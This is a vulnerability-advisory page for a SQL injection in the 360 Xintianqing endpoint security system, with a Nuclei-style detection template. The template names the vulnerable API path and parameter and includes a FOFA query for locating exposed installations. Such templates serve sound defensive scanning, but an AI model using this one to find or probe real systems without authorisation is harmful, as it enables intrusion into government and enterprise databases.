CNVD-2021-32799: 360 Xintianqing - SQL Injection

日期: 2025-08-01 | 影响软件: 360 Xintianqing | POC: 已公开

漏洞描述

The Tianqing Terminal Security Management System, designed for government and enterprise use, faces a SQL injection vulnerability. This flaw could enable attackers to access sensitive database information.

PoC代码[已公开]

id: CNVD-2021-32799

info:
  name: 360 Xintianqing - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    The Tianqing Terminal Security Management System, designed for government and enterprise use, faces a SQL injection vulnerability. This flaw could enable attackers to access sensitive database information.
  reference:
    - https://blog.51cto.com/u_9691128/4295047
    - https://www.cnvd.org.cn/patchInfo/show/270651
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/CNVD/2021/CNVD-2021-32799.yaml
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="360新天擎"
  tags: cnvd2021,cnvd,360,xintianqing,sqli,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/dp/rptsvcsyncpoint?ccid=1'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"reason":'
          - '"success"'
          - '"antiadwa":'
          - '"clientupgrade":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220352cd7233936b7f3141b908be0873ec48037c0e56e71f2a391687cef7dba2dde02202f9a3137073a9f1195ebcfbe2755f7c1ee97c3709d3ae0c093c5fa14a29fe4d1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐